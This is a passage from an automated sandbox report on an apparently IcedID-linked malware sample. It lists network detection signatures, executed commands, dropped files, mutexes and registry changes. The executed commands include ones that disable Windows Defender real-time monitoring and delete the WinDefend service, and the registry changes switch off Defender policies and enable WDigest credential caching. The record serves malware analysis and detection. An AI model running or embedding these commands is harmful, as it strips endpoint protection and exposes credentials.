1313. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
1314. },
1315. {
1316. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
1317. },
1318. {
1319. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
1320. }
1321. ]
1322. },
1323. {
1324. "Description": "Creates a slightly modified copy of itself",
1325. "Details": [
1326. {
1327. "file": "C:\\ProgramData\\{D62673F0-37F0-46DA-BFC0-5B9596B01F09}\\{562673F1-37F1-46DA-BFC1-5B959AB01F09}\\jaykd.exe"
1328. },
1329. {
1330. "percent_match": 97
1331. }
1332. ]
1333. },
1334. {
1335. "Description": "Created network traffic indicative of malicious activity",
1336. "Details": [
1337. {
1338. "signature": "ET DNS Query to a *.pw domain - Likely Hostile"
1339. },
1340. {
1341. "signature": "ET TROJAN Observed Malicious SSL Cert (IcedID CnC)"
1342. },
1343. {
1344. "signature": "ET TROJAN IcedID WebSocket Request"
1345. },
1346. {
1347. "signature": "ET USER_AGENTS Suspicious User-Agent (contains loader)"
1348. },
1349. {
1350. "signature": "ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile"
1351. }
1352. ]
1353. }
1354. ]
1355.  
1356. [*] Started Service: [
1357. "VaultSvc"
1358. ]
1359.  
1360. [*] Executed Commands: [
1361. "\"C:\\Users\\user\\AppData\\Local\\Temp\\Exes_a36b52c9b4a33691b5caa7809525858c.jpg\"",
1362. "\"C:\\Users\\user\\AppData\\Local\\Temp\\Exes_a36b52c9b4a33691b5caa7809525858c.jpg\" -q=3495182083",
1363. "C:\\Windows\\system32\\svchost.exe",
1364. "\"C:\\Users\\user\\AppData\\Local\\Temp\\meaykdxuvtfy.exe\"",
1365. "svchost.exe",
1366. "\"C:\\Users\\user\\AppData\\Local\\Temp\\reayx.exe\"",
1367. "\"C:\\Users\\user\\AppData\\Local\\Temp\\fykqg.exe\"",
1368. "\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE wmiadap.exe /F /T /R",
1369. "taskeng.exe {ECF6766C-2A67-4495-AB29-07508A8B88E1} S-1-5-18:NT AUTHORITY\\System:Service:",
1370. "taskeng.exe {EF0E2588-90B9-412E-A552-5B4B15D00033} S-1-5-21-0000000000-0000000000-0000000000-1000:Host\\user:Interactive:[1]",
1371. "C:\\Windows\\system32\\cmd.exe /C PowerShell \"Start-Sleep 10; Remove-Item C:\\Users\\user\\AppData\\Local\\Temp\\meaykdxuvtfy.exe\"",
1372. "\"C:\\Windows\\System32\\cmd.exe\" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
1373. "cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
1374. "\"C:\\Windows\\System32\\cmd.exe\" /c sc stop WinDefend",
1375. "cmd /c sc stop WinDefend",
1376. "\"C:\\Windows\\System32\\cmd.exe\" /c sc delete WinDefend",
1377. "cmd /c sc delete WinDefend",
1378. "C:\\Windows\\system32\\cmd.exe /c sc stop WinDefend",
1379. "C:\\Windows\\system32\\cmd.exe /c sc delete WinDefend",
1380. "C:\\Windows\\system32\\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
1381. "C:\\Users\\user\\AppData\\Roaming\\diskram\\teayx.exe",
1382. "powershell Set-MpPreference -DisableRealtimeMonitoring $true",
1383. "sc stop WinDefend",
1384. "sc delete WinDefend",
1385. "cmd.exe cmd.exe /c timeout 1 && del C:\\Users\\user\\AppData\\Local\\Temp\\fykqg.exe\"",
1386. "timeout 1",
1387. "C:\\Windows\\system32\\lsass.exe",
1388. "C:\\Windows\\system32\\svchost.exe -k netsvcs",
1389. "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe PowerShell \"Start-Sleep 10; Remove-Item C:\\Users\\user\\AppData\\Local\\Temp\\meaykdxuvtfy.exe\"",
1390. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding",
1391. "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\"",
1392. "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload mininterval:2880",
1393. "\"C:\\Program Files\\Microsoft Office\\Office15\\msoia.exe\" scan upload"
1394. ]
1395.  
1396. [*] Mutexes: [
1397. "Local\\ZoneAttributeCacheCounterMutex",
1398. "Local\\ZonesCacheCounterMutex",
1399. "Local\\ZonesLockedCacheCounterMutex",
1400. "Global\\CLR_CASOFF_MUTEX",
1401. "Global\\838B6C9EB27932960",
1402. "Global\\ADAP_WMI_ENTRY",
1403. "Global\\RefreshRA_Mutex",
1404. "Global\\RefreshRA_Mutex_Lib",
1405. "Global\\RefreshRA_Mutex_Flag"
1406. ]
1407.  
1408. [*] Modified Files: [
1409. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-0000000000-0000000000-0000000000-1000\\00000000-0000-0000-0000-000000000000b_00000000-0000-0000-0000-000000000000",
1410. "C:\\ProgramData\\{D62673F0-37F0-46DA-BFC0-5B9596B01F09}\\{562673F1-37F1-46DA-BFC1-5B959AB01F09}\\jaykd.exe",
1411. "\\??\\PIPE\\wkssvc",
1412. "C:\\Users\\user\\AppData\\Local\\Temp\\CabCB27.tmp",
1413. "C:\\Users\\user\\AppData\\Local\\Temp\\TarCB28.tmp",
1414. "C:\\Users\\user\\AppData\\Local\\Temp\\CabCBF4.tmp",
1415. "C:\\Users\\user\\AppData\\Local\\Temp\\TarCBF5.tmp",
1416. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015",
1417. "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015",
1418. "C:\\Users\\user\\AppData\\Local\\Temp\\CabCEC5.tmp",
1419. "C:\\Users\\user\\AppData\\Local\\Temp\\TarCEC6.tmp",
1420. "C:\\ProgramData\\xuicz\\bwwwjneb.dat",
1421. "C:\\ProgramData\\xuicz\\reayxhec.dat",
1422. "C:\\Users\\user\\AppData\\Local\\Temp\\meaykdxuvtfy.exe",
1423. "C:\\ProgramData\\xuicz\\vgoshzcb.dat",
1424. "C:\\ProgramData\\xuicz\\losuvtcc.dat",
1425. "C:\\ProgramData\\xuicz\\zicmrrbc.dat",
1426. "C:\\Users\\user\\AppData\\Local\\Temp\\reayx.exe",
1427. "C:\\Users\\user\\AppData\\Local\\Temp\\fykqg.exe",
1428. "C:\\ProgramData\\xuicz\\pqgoflgc.dat",
1429. "C:\\ProgramData\\xuicz\\hmealbdb.dat",
1430. "C:\\Windows\\sysnative\\Tasks\\{D6266B5F-EE5F-44B6-BEAC-5B0C0EB01EC5}",
1431. "\\Device\\LanmanDatagramReceiver",
1432. "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
1433. "C:\\Windows\\sysnative\\Tasks\\BrowserDatStorage",
1434. "\\??\\PIPE\\srvsvc",
1435. "C:\\Windows\\sysnative\\Tasks\\MNU Net libraries",
1436. "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
1437. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
1438. "\\??\\PIPE\\browser",
1439. "C:\\Users\\user\\AppData\\Local\\Temp\\AC4DF441.tmp",
1440. "C:\\Users\\user\\AppData\\Roaming\\diskram\\teayx.exe",
1441. "C:\\Windows\\sysnative\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
1442. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\13KJKCMY2LWCHOD40HJV.temp",
1443. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF12ade02.TMP",
1444. "C:\\Windows\\SysWOW64\\log_install.tmp",
1445. "\\??\\PIPE\\DAV RPC SERVICE",
1446. "C:\\Windows\\SysWOW64\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
1447. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\A6YPJ2CZOO169M663GHM.temp",
1448. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms",
1449. "C:\\Users\\user\\AppData\\Roaming\\diskram\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
1450. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\QMFTAW2QICMY2DNPY213.temp",
1451. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF12b38b5.TMP",
1452. "C:\\Users\\user\\AppData\\Local\\Temp\\CabFFD3.tmp",
1453. "C:\\Users\\user\\AppData\\Local\\Temp\\TarFFD4.tmp",
1454. "C:\\Users\\user\\AppData\\Local\\Temp\\sqlite3.dll",
1455. "C:\\Users\\user\\AppData\\Local\\Temp\\meaykdxuvtfy.tmp",
1456. "C:\\Users\\user\\AppData\\Local\\Temp\\reayx.tmp",
1457. "C:\\Users\\user\\AppData\\Local\\Temp\\fykqg.tmp",
1458. "C:\\Users\\user\\AppData\\Local\\Temp\\reayxh.tmp",
1459. "C:\\Users\\user\\AppData\\Local\\Temp\\reaykd.tmp",
1460. "C:\\Users\\user\\AppData\\Local\\Temp\\ipqgbwj.tmp",
1461. "C:\\Users\\user\\AppData\\Local\\Temp\\qtsuicz.tmp",
1462. "C:\\Users\\user\\AppData\\Local\\Temp\\wjayxhzv.tmp",
1463. "C:\\Users\\user\\AppData\\Local\\Temp\\czicmrrr.tmp",
1464. "C:\\Users\\user\\AppData\\Local\\Temp\\vtsuvgosh.tmp",
1465. "C:\\Users\\user\\AppData\\Local\\Temp\\vtsuicmea.tmp",
1466. "C:\\Users\\user\\AppData\\Local\\Temp\\npqgbjayxu.tmp",
1467. "C:\\Users\\user\\AppData\\Local\\Temp\\dxuiczicme.tmp",
1468. "C:\\Users\\user\\AppData\\Local\\Temp\\wwjalofyxhm.tmp",
1469. "C:\\Users\\user\\AppData\\Local\\Temp\\kqtsuipqgbj.tmp",
1470. "C:\\Users\\user\\AppData\\Local\\Temp\\menczvtshzic.tmp",
1471. "C:\\Users\\user\\AppData\\Local\\Temp\\qgbwwjncmren.tmp",
1472. "C:\\Users\\user\\AppData\\Local\\Temp\\fyxuv.tmp",
1473. "C:\\Users\\user\\AppData\\Local\\Temp\\bwjay.tmp",
1474. "C:\\Users\\user\\AppData\\Local\\Temp\\jalofl.tmp",
1475. "C:\\Users\\user\\AppData\\Local\\Temp\\hmreal.tmp",
1476. "C:\\Users\\user\\AppData\\Local\\Temp\\gbjalof.tmp",
1477. "C:\\Users\\user\\AppData\\Local\\Temp\\yxhmeal.tmp",
1478. "C:\\Users\\user\\AppData\\Local\\Temp\\czvgbjnp.tmp",
1479. "C:\\Users\\user\\AppData\\Local\\Temp\\albwwjnp.tmp",
1480. "C:\\Users\\user\\AppData\\Local\\Temp\\vtfyxuicm.tmp",
1481. "C:\\Users\\user\\AppData\\Local\\Temp\\hzvgosuip.tmp",
1482. "C:\\Users\\user\\AppData\\Local\\Temp\\rrrenpqgos.tmp",
1483. "C:\\Users\\user\\AppData\\Local\\Temp\\pdxuipqgbj.tmp",
1484. "C:\\Users\\user\\AppData\\Local\\Temp\\cmenpqtsuvg.tmp",
1485. "C:\\Users\\user\\AppData\\Local\\Temp\\osuvgofyxui.tmp",
1486. "C:\\Users\\user\\AppData\\Local\\Temp\\uiczvtfykdxu.tmp",
1487. "C:\\Users\\user\\AppData\\Local\\Temp\\wwwjalbwjayx.tmp",
1488. "C:\\Users\\user\\AppData\\Local\\Temp\\tsuvt.tmp",
1489. "C:\\Users\\user\\AppData\\Local\\Temp\\ziczi.tmp",
1490. "C:\\Users\\user\\AppData\\Local\\Temp\\hmenpd.tmp",
1491. "C:\\Users\\user\\AppData\\Local\\Temp\\ncmren.tmp",
1492. "C:\\Users\\user\\AppData\\Local\\Temp\\kdkdxuv.tmp",
1493. "C:\\Users\\user\\AppData\\Local\\Temp\\mrencmr.tmp",
1494. "C:\\Users\\user\\AppData\\Local\\Temp\\ipqtflbj.tmp",
1495. "C:\\Users\\user\\AppData\\Local\\Temp\\mrenczvt.tmp",
1496. "C:\\Users\\user\\AppData\\Local\\Temp\\npqtfykqt.tmp",
1497. "C:\\Users\\user\\AppData\\Local\\Temp\\vtshmeayk.tmp",
1498. "C:\\Users\\user\\AppData\\Local\\Temp\\zvgbjncmrr.tmp",
1499. "C:\\Users\\user\\AppData\\Local\\Temp\\pdkdkdkqgb.tmp",
1500. "C:\\Users\\user\\AppData\\Local\\Temp\\iczvtshmren.tmp",
1501. "C:\\Users\\user\\AppData\\Local\\Temp\\ealbwwjaykq.tmp",
1502. "C:\\Users\\user\\AppData\\Local\\Temp\\wwjnpdxuvgbw.tmp",
1503. "C:\\Users\\user\\AppData\\Local\\Temp\\qgbjalbwwwja.tmp",
1504. "C:\\Users\\user\\AppData\\Local\\Temp\\bwjnp.tmp",
1505. "C:\\Users\\user\\AppData\\Local\\Temp\\zipdk.tmp",
1506. "C:\\Users\\user\\AppData\\Local\\Temp\\xuvtfl.tmp",
1507. "C:\\Users\\user\\AppData\\Local\\Temp\\pqtfyx.tmp",
1508. "C:\\Users\\user\\AppData\\Local\\Temp\\shzvtsh.tmp",
1509. "C:\\Users\\user\\AppData\\Local\\Temp\\ipdxuip.tmp",
1510. "C:\\Users\\user\\AppData\\Local\\Temp\\gbjnpdxh.tmp",
1511. "C:\\Users\\user\\AppData\\Local\\Temp\\kdxhmrrr.tmp",
1512. "C:\\Users\\user\\AppData\\Local\\Temp\\vtflbwwww.tmp",
1513. "C:\\Users\\user\\AppData\\Local\\Temp\\jnpdkqgof.tmp",
1514. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\QW90F9X06C112UFDY56Y.temp",
1515. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF12b7a32.TMP",
1516. "C:\\Windows\\sysnative\\wbem\\Performance\\WmiApRpl_new.h",
1517. "C:\\Windows\\sysnative\\wbem\\Performance\\WmiApRpl.h",
1518. "C:\\Windows\\sysnative\\wbem\\Performance\\WmiApRpl_new.ini",
1519. "\\??\\WMIDataDevice",
1520. "\\??\\PIPE\\samr",
1521. "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
1522. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
1523. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
1524. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
1525. "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
1526. "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
1527. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
1528. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
1529. ]
1530.  
1531. [*] Deleted Files: [
1532. "C:\\Users\\user\\AppData\\Local\\Temp\\CabCB27.tmp",
1533. "C:\\Users\\user\\AppData\\Local\\Temp\\TarCB28.tmp",
1534. "C:\\Users\\user\\AppData\\Local\\Temp\\CabCBF4.tmp",
1535. "C:\\Users\\user\\AppData\\Local\\Temp\\TarCBF5.tmp",
1536. "C:\\Users\\user\\AppData\\Local\\Temp\\CabCEC5.tmp",
1537. "C:\\Users\\user\\AppData\\Local\\Temp\\TarCEC6.tmp",
1538. "C:\\Windows\\Tasks\\{D6266B5F-EE5F-44B6-BEAC-5B0C0EB01EC5}.job",
1539. "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows Defender\\MpIdleTask",
1540. "C:\\Windows\\Tasks\\BrowserDatStorage.job",
1541. "C:\\Windows\\Tasks\\MNU Net libraries.job",
1542. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log",
1543. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF12ade02.TMP",
1544. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.1936.19586921",
1545. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.1936.19586921",
1546. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.1936.19586921",
1547. "C:\\Windows\\System32\\log_install.tmp",
1548. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\A6YPJ2CZOO169M663GHM.temp",
1549. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2644.19608968",
1550. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2644.19608968",
1551. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2644.19608968",
1552. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF12b38b5.TMP",
1553. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.852.19609859",
1554. "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.852.19609859",
1555. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.852.19609859",
1556. "C:\\Users\\user\\AppData\\Local\\Temp\\CabFFD3.tmp",
1557. "C:\\Users\\user\\AppData\\Local\\Temp\\TarFFD4.tmp",
1558. "C:\\Users\\user\\AppData\\Local\\Temp\\meaykdxuvtfy.tmp",
1559. "C:\\Users\\user\\AppData\\Local\\Temp\\reayx.tmp",
1560. "C:\\Users\\user\\AppData\\Local\\Temp\\osuvgofyxui.tmp",
1561. "C:\\Users\\user\\AppData\\Local\\Temp\\fykqg.exe",
1562. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms~RF12b7a32.TMP",
1563. "C:\\Users\\user\\AppData\\Local\\Temp\\meaykdxuvtfy.exe",
1564. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2068.19626656",
1565. "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2068.19626656",
1566. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2068.19626656",
1567. "C:\\Windows\\sysnative\\wbem\\Performance\\WmiApRpl.h",
1568. "C:\\Windows\\sysnative\\wbem\\Performance\\WmiApRpl_new.h"
1569. ]
1570.  
1571. [*] Modified Registry Keys: [
1572. "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
1573. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94DE636A-CEDF-4E97-888F-46B0B9CAAB47}\\Path",
1574. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94DE636A-CEDF-4E97-888F-46B0B9CAAB47}\\Hash",
1575. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\{D6266B5F-EE5F-44B6-BEAC-5B0C0EB01EC5}\\Id",
1576. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\{D6266B5F-EE5F-44B6-BEAC-5B0C0EB01EC5}\\Index",
1577. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94DE636A-CEDF-4E97-888F-46B0B9CAAB47}\\Triggers",
1578. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{94DE636A-CEDF-4E97-888F-46B0B9CAAB47}\\DynamicInfo",
1579. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{844E0DFC-7472-4CA9-96DC-9859ED19B312}\\Path",
1580. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{844E0DFC-7472-4CA9-96DC-9859ED19B312}\\Hash",
1581. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\BrowserDatStorage\\Id",
1582. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\BrowserDatStorage\\Index",
1583. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{844E0DFC-7472-4CA9-96DC-9859ED19B312}\\Triggers",
1584. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{844E0DFC-7472-4CA9-96DC-9859ED19B312}\\DynamicInfo",
1585. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{C6CC84E0-74E0-4E01-AEB1-2B270F857772}\\Path",
1586. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{C6CC84E0-74E0-4E01-AEB1-2B270F857772}\\Hash",
1587. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\MNU Net libraries\\Id",
1588. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\MNU Net libraries\\Index",
1589. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{C6CC84E0-74E0-4E01-AEB1-2B270F857772}\\Triggers",
1590. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{C6CC84E0-74E0-4E01-AEB1-2B270F857772}\\DynamicInfo",
1591. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
1592. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\PreviousServiceShutdown",
1593. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ProcessID",
1594. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{ED0D73D7-BC97-46E2-AC55-FD6EB3F72C05}\\DynamicInfo",
1595. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\{ECF6766C-2A67-4495-AB29-07508A8B88E1}",
1596. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{B17E070E-57E3-43F6-96F5-A9A9C921DEBF}\\DynamicInfo",
1597. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\Handshake\\{EF0E2588-90B9-412E-A552-5B4B15D00033}",
1598. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\{DF000DCA-3FA2-48A6-9E59-C0606F9F8D73}\\DynamicInfo",
1599. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
1600. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
1601. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender",
1602. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware",
1603. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection",
1604. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring",
1605. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnAccessProtection",
1606. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnRealtimeEnable",
1607. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableIOAVProtection",
1608. "DisableNotifications",
1609. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\SecurityProviders\\WDigest\\UseLogonCredential",
1610. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
1611. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ThrottleDrege",
1612. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Parameters\\ServiceDllUnloadOnStop",
1613. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
1614. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
1615. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
1616. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
1617. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
1618. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
1619. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider",
1620. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\IDE\\DiskVBOX_HARDDISK___________________________1.0_____\\5&33d1638a&0&0.0.0_0-{00000000-0000-0000-0000-000000000000}",
1621. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\advapi32.dll[MofResourceName]",
1622. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\en-US\\advapi32.dll.mui[MofResourceName]",
1623. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\ACPI.sys[ACPIMOFResource]",
1624. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\en-US\\ACPI.sys.mui[ACPIMOFResource]",
1625. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\ndis.sys[MofResourceName]",
1626. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\drivers\\en-US\\ndis.sys.mui[MofResourceName]",
1627. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\mssmbios.sys[MofResource]",
1628. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\mssmbios.sys.mui[MofResource]",
1629. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\HDAudBus.sys[HDAudioMofName]",
1630. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\WDM\\C:\\Windows\\system32\\DRIVERS\\en-US\\HDAudBus.sys.mui[HDAudioMofName]",
